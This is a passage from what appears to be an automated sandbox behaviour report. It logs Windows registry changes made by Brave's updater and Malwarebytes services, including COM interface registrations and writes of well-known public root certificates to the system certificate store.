| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4BCDF52-2179-4C77-8C5F-B8095712B563}\NumMethods | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AC5390D0-3831-4D42-BD1D-8151A5A1742C}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{239C7555-993F-4071-9081-D2AE0B590D63}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MB.ScanController\CurVer | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E3D4AC2-A9AE-478A-91EE-79C35D3CA8C7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6CE18DD5-2BD7-4844-B9AD-DF6A995750A1}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7CFC4E00-1C9D-443D-B5BE-CEEEAC1443AF}\ProxyStubClsid32\ = "{51F87104-87CE-44E6-B700-998AEB9FE260}" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BFC6C7E6-8475-4F9B-AC56-AD22BECF91C4}\ = "IMBAMServiceControllerEventsV2" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F275D775-3A22-4C5A-B9AD-6FE8008304D0} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AAE4AD28-500D-43BA-9F54-730CA146C190}\ProxyStubClsid32\ = "{51F87104-87CE-44E6-B700-998AEB9FE260}" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5083B4CA-BBA6-43DD-B36E-DEA787CA0CAD}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1861D707-8D71-497D-8145-62D5CBF4222F} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{02143C0F-1656-4B2E-95E7-EA8178A29E2E}\ = "IScanControllerEventsV4" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{25321640-5EF1-4095-A0DA-30DE19699441}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCF0F42-EF8F-4450-BA68-42B61F594B2F}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5083B4CA-BBA6-43DD-B36E-DEA787CA0CAD}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D51C573D-B305-4980-8DFF-076C1878CCFB}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3498D9E4-6476-4AC0-B53A-75BC9955EF37}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf5140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa20f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e1900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c0000000100000004000000001000001900000001000000100000009f687581f7ef744ecfc12b9cee6238f10f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa2140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
